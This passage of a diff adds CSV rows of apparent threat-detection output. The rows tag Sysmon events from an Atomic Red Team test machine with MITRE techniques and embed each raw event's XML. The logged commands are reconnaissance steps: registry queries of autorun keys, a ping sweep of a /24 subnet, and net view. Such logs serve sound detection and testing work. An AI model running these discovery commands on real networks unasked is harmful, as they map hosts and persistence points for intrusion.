+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:33.147861Z"">
+    </TimeCreated>
+    <EventRecordID>3707</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:33.113</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-00102B773100</Data>
+    <Data Name=""ProcessId"">2148</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:33.036329Z"">
+    </TimeCreated>
+    <EventRecordID>3705</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:33.019</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-001090723100</Data>
+    <Data Name=""ProcessId"">196</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.975133Z"">
+    </TimeCreated>
+    <EventRecordID>3703</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.956</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010056E3100</Data>
+    <Data Name=""ProcessId"">4220</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.921206Z"">
+    </TimeCreated>
+    <EventRecordID>3701</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.900</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-00107C693100</Data>
+    <Data Name=""ProcessId"">1740</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.850894Z"">
+    </TimeCreated>
+    <EventRecordID>3699</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.842</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010E1643100</Data>
+    <Data Name=""ProcessId"">5936</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:49:32.789067Z"">
+    </TimeCreated>
+    <EventRecordID>3697</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:49:32.775</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-001056603100</Data>
+    <Data Name=""ProcessId"">6832</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:35.014760Z"">
+    </TimeCreated>
+    <EventRecordID>3773</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:34.991</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8F6-5D31-0000-001091D13300</Data>
+    <Data Name=""ProcessId"">4528</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:34.797834Z"">
+    </TimeCreated>
+    <EventRecordID>3772</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:34.779</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8F6-5D31-0000-00100FCB3300</Data>
+    <Data Name=""ProcessId"">3344</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net  view ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:22.333688Z"">
+    </TimeCreated>
+    <EventRecordID>3771</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:22.330</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-00108AB83300</Data>
+    <Data Name=""ProcessId"">4684</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  view</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8EA-5D31-0000-001030B63300</Data>
+    <Data Name=""ParentProcessId"">1988</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;net view&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net  view ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:51:22.333688Z"">
+    </TimeCreated>
+    <EventRecordID>3771</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:51:22.330</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8EA-5D31-0000-00108AB83300</Data>
+    <Data Name=""ProcessId"">4684</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  view</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
